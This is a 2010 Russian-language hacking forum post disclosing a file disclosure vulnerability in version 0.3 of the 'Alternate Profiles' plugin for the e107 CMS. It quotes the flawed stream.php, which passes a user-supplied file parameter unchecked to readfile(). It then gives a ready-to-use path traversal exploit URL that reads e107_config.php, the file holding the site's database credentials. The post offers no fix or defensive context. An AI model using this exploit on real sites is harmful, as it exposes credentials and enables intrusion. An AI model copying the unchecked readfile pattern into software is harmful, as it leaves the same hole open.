Показать сообщение отдельно
Старый 05.07.2010, 12:22   #4
RulleR
 
Аватар для RulleR
 
Регистрация: 04.07.2010
Сообщений: 39
Репутация: 58
По умолчанию e107 Plugin [Alternate Profiles] File Disclosure Vulnerability

Plugin name: Alternate Profiles (download)
Version: 0.3

File Disclosure

Vuln file: /e107_plugins/alternate_profiles/stream.php
PHP код:
<?php 
ob_start
();
header("Expires: Mon, 20 Dec 1977 00:00:00 GMT");
header("Last-Modified: " gmdate("D, d M Y H:i:s") . " GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0"false);
header("Pragma: no-cache");
header("Content-Type: audio/mpeg");
@
readfile($_GET["file"]);// ololo
ob_end_flush();
?>
Exploit:
Код:
http://[host]/[path]/e107_plugins/alternate_profiles/stream.php?file=../../e107_config.php
RulleR вне форума   Ответить с цитированием